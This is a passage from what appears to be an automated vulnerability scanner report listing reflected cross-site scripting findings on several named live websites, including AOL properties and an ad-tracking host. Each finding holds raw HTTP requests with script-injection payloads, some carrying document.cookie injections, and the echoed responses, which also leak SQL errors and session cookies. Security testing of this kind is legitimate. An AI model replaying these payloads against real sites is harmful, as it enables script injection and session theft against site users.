Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:14 GMT
Expires: Sun, 06 Feb 2011 20:38:15 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDCCQTRADB=BJFKINMCIAFIFOKPEBOLGODF; path=/
X-Powered-By: ASP.NET
Content-Length: 999
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'f9f9'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1804, @bannerCreativeAdModuleId = 200319f9f9<script>alert(1)</script>58e0364ee35, @campaignId = 6035, @syndicationOutletId = 44418, @adrotationId = 14567, @ipAddress = '173.193.214.243', @sessionId = '752425316', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.cbs.c
...[SNIP]...

1.223. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the campaignId request parameter is copied into the HTML document as plain text between tags. The payload 3872b<script>alert(1)</script>508553eaf6f was submitted in the campaignId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=44418&campaignId=60353872b<script>alert(1)</script>508553eaf6f&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:08 GMT
Expires: Sun, 06 Feb 2011 20:38:08 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQTQSBDB=ABKFHBNCCDOGEAKPCMKCCBHA; path=/
X-Powered-By: ASP.NET
Content-Length: 996
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'b'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1804, @bannerCreativeAdModuleId = 20031, @campaignId = 60353872b<script>alert(1)</script>508553eaf6f, @syndicationOutletId = 44418, @adrotationId = 14567, @ipAddress = '173.193.214.243', @sessionId = '756534601', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.cbs.com/primetime/big_ban
...[SNIP]...

1.224. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the siteId request parameter is copied into the HTML document as plain text between tags. The payload 6e2c7<script>alert(1)</script>ecfd5510463 was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=18046e2c7<script>alert(1)</script>ecfd5510463&syndicationOutletId=44418&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:07 GMT
Expires: Sun, 06 Feb 2011 20:38:07 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQAQRAADB=AMBBLJHDLNPJPAHAJKBIOLFH; path=/
X-Powered-By: ASP.NET
Content-Length: 997
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'c7'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 18046e2c7<script>alert(1)</script>ecfd5510463, @bannerCreativeAdModuleId = 20031, @campaignId = 6035, @syndicationOutletId = 44418, @adrotationId = 14567, @ipAddress = '173.193.214.243', @sessionId = '932910221', @pixel = '0', @ipNumber = '291516
...[SNIP]...

1.225. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The value of the syndicationOutletId request parameter is copied into the HTML document as plain text between tags. The payload 2f6c5<script>alert(1)</script>9b9dc606334 was submitted in the syndicationOutletId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Tracking/V2/BannerCreative/Impression/?siteId=1804&syndicationOutletId=444182f6c5<script>alert(1)</script>9b9dc606334&campaignId=6035&adRotationId=14567&bannerCreativeAdModuleId=20031&redirect=http%3a%2f%2fvindicoasset.edgesuite.net%2fRepository%2fCampaignCreative%2fCampaign_6035%2fBANNERCREATIVE%2fglad_300x250_23.jpg HTTP/1.1
Host: trk.vindicosuite.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VINDICOSUITEAUDIENCE=%7B%22PL%22%3A%7B%223BBC8FBC%2DC6A8%2D43A6%2DB65C%2D2405955B79FE%22%3A%7B%2253398251%2DC5D1%2D4466%2D84FA%2D7CEE6AF3F691%22%3A%221295658149%22%7D%7D%7D; VINDICOAUDIENCEISSUEDIDENTITY=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; vpp=10aa51b8-16d7-4be9-8b5a-488ee3c949fc; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}; 10aa51b8-16d7-4be9-8b5a-488ee3c949fc_vpp={1296137382377:InstreamImpression_0:6146|14|2080|45439|14942|33453|10|2204:2}{1296137388154:InstreamImpression_25:6146|14|2080|45439|14942|33453|10|2204:2}{1296137389177:InstreamImpression_50:6146|14|2080|45439|14942|33453|10|2204:2}{1296137394130:InstreamImpression_75:6146|14|2080|45439|14942|33453|10|2204:2}{1296137398881:InstreamImpression_100:6146|14|2080|45439|14942|33453|10|2204:1}{1296749649702:InstreamImpression_0:5745|413|1574|42244|14160|30521|868|2293:1}

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Sun, 06 Feb 2011 20:38:07 GMT
Expires: Sun, 06 Feb 2011 20:38:07 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSDSSCBB=AMKDELMCPLOBBHMIPCAAEIPL; path=/
X-Powered-By: ASP.NET
Content-Length: 999
Connection: keep-alive

<br>Error Description:Incorrect syntax near 'f6c5'.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = 1804, @bannerCreativeAdModuleId = 20031, @campaignId = 6035, @syndicationOutletId = 444182f6c5<script>alert(1)</script>9b9dc606334, @adrotationId = 14567, @ipAddress = '173.193.214.243', @sessionId = '750039461', @pixel = '0', @ipNumber = '2915161843', @referer = 'http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert
...[SNIP]...

1.226. http://web.lightningcast.net/servlets/getPlaylist [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.lightningcast.net
Path:   /servlets/getPlaylist

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 30f97<script>alert(1)</script>daaff63cbfb was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlets/getPlaylist?ver=2.0&client=fcas3_1.12.2.2.BETA.AOL&fv=WIN%2010,1,103,22&attr=[Domain,fanhouse.com][Autoplay,false][adamid,none]&baudit=server&tname=AutoplayOff&crlen=t&nwid=278524&content=NO_VIDEO_URL&format=Video-Flash-400-400x300&regions=StandardBanner&uid=95293821230f97<script>alert(1)</script>daaff63cbfb&level=Sports:nfl&audit=param&resp=SMIL&pu=http%3A//www.fanhouse.com/%3Ff9308%2522-alert%28document.cookie%29-%2522caa87257aff%3D1 HTTP/1.1
Host: web.lightningcast.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=300&height=295&flashID=myaolExperience&bgcolor=%23FFFFFF&playerID=43942763001&publisherID=1612833736&isVid=true&isUI=true&autoStart=false&%40videoList=64092604001&wmode=transparent
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:39:47 GMT
Server: Apache/2.2.6 (Fedora)
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Expires: -1
Connection: close
P3P: policyref="http://web.lightningcast.net/w3c/p3p.xml",CP="NON DSP COR CURa TAIo PSDo OUR IND PHY DEM STA LOC"
Content-Type: application/smil
Content-Length: 757

<smil xmlns:lc="http://web.lightningcast.com/2006/SMIL20/Language"
title="AOL US Playlist">
   <head>
       <meta name="template" content="AutoplayOff (98652) - v5"/>
       <meta name="gpserver" content="ntc-d
...[SNIP]...
<meta name="uuid" content="95293821230f97<script>alert(1)</script>daaff63cbfb"/>
...[SNIP]...

1.227. http://webcenter.polls.aol.com/modular.jsp [template parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://webcenter.polls.aol.com
Path:   /modular.jsp

Issue detail

The value of the template request parameter is copied into the HTML document as plain text between tags. The payload ff2c5<script>alert(1)</script>dafbfb81510 was submitted in the template parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /modular.jsp?template=1386ff2c5<script>alert(1)</script>dafbfb81510&view=190752&pollId=191044&a... HTTP/1.1
Host: webcenter.polls.aol.com
Proxy-Connection: keep-alive
Referer: http://www.fanhouse.com/?f9308%22-alert(document.cookie)-%22caa87257aff=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:39:51 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7i mod_rsp20/RSP_Plugins_v8_r3.05-12-09:mod_rsp20_large.so.rhe-4-x86.v8_r3.40 mod_jk/1.2.19
Set-Cookie: RSP_DAEMON=9e1d6d50428084a60e4f8ab55a65a11f; path=/; HttpOnly
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Set-Cookie: JSESSIONID=4FBABB732C7B849F548765FCBEDF26F7; Path=/
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Last-Modified: Sun, 06 Feb 2011 20:39:51 GMT
Expires: 0
Cteonnt-Length: 161
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161

/oap/polls/ui/webapps/xsl/q1386ff2c5<script>alert(1)</script>dafbfb81510.xslt (No such file or directory)



1.228. http://www.aisledash.com/ [3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aisledash.com
Path:   /

Issue detail

The value of the 3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f0d"><script>alert(1)</script>6f15c085aa8 was submitted in the 3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255=120f0d"><script>alert(1)</script>6f15c085aa8 HTTP/1.1
Host: www.aisledash.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1297023866964-New%7C1360095866964%3B%20s_nrgvo%3DNew%7C1360095867077%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.73bc; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.73bc

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:24:02 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Content-Length: 51781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.aisledash.com/?3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255=120f0d"><script>alert(1)</script>6f15c085aa8" />
...[SNIP]...

1.229. http://www.aisledash.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aisledash.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3418b"><script>alert(1)</script>3224aeef255 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3418b"><script>alert(1)</script>3224aeef255=1 HTTP/1.1
Host: www.aisledash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:15:54 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999897
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 51480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.aisledash.com/?3418b"><script>alert(1)</script>3224aeef255=1" />
...[SNIP]...

1.230. http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolhealth.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efb95"><script>alert(1)</script>2a680ac5448 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?efb95"><script>alert(1)</script>2a680ac5448=1 HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:15:56 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=f8dd648892fdb2784a8d4f9f298fb884; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=999986
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 53339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.aolhealth.com/?efb95"><script>alert(1)</script>2a680ac5448=1">
...[SNIP]...

1.231. http://www.aolhealth.com/encyclopedia/health/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aolhealth.com
Path:   /encyclopedia/health/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65d49"><script>alert(1)</script>6681fd48a3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /encyclopedia65d49"><script>alert(1)</script>6681fd48a3a/health/ HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:00 GMT
Server: Apache/2.2
Set-Cookie: PHPSESSID=fa5c123b6e1b865dbf4ee1f85f003d9e; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=999978
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 42697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://www.aolhealth.com/encyclopedia65d49"><script>alert(1)</script>6681fd48a3a/health/">
...[SNIP]...

1.232. http://www.aolhealth.com/encyclopedia/health/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolhealth.com
Path:   /encyclopedia/health/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f82e"%3b98c2b66b2ac was submitted in the REST URL parameter 2. This input was echoed as 6f82e";98c2b66b2ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /encyclopedia/health6f82e"%3b98c2b66b2ac/ HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:16:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1AFFC58ED2FFE914B0FCD00CD146A9D1; Path=/
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 58511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
kExternalLinks="true";
s_265.channel="us.health";
s_265.prop1="Condition Center | Health Encyclopedia";
s_265.pfxID="hth";
s_265.prop2="Main";
s_265.prop12="http://www.aolhealth.com/encyclopedia/health6f82e";98c2b66b2ac/";
s_265.prop17="";
s_265.prop18="";
s_265.mmxgo=true;
s_265.disablepihost=false;
s_265.disablepipath=false;
s_265.mmxtitle="Health Encyclopedia Main";
s_265.linkInternalFilters="javascript:,aolhealth
...[SNIP]...

1.233. http://www.aolhealth.com/encyclopedia/health/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.aolhealth.com
Path:   /encyclopedia/health/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4201</script><a>59aed720f83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /encyclopedia/health/?f4201</script><a>59aed720f83=1 HTTP/1.1
Host: www.aolhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:15:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=F127D8877ADE90704E8E2FF6A6DAE314; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 58524


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.or
...[SNIP]...
xternalLinks="true";
s_265.channel="us.health";
s_265.prop1="Condition Center | Health Encyclopedia";
s_265.pfxID="hth";
s_265.prop2="Main";
s_265.prop12="http://www.aolhealth.com/encyclopedia/health/?f4201</script><a>59aed720f83=1";
s_265.prop17="";
s_265.prop18="";
s_265.mmxgo=true;
s_265.disablepihost=false;
s_265.disablepipath=false;
s_265.mmxtitle="Health Encyclopedia Main";
s_265.linkInternalFilters="javascript:,aolhealt
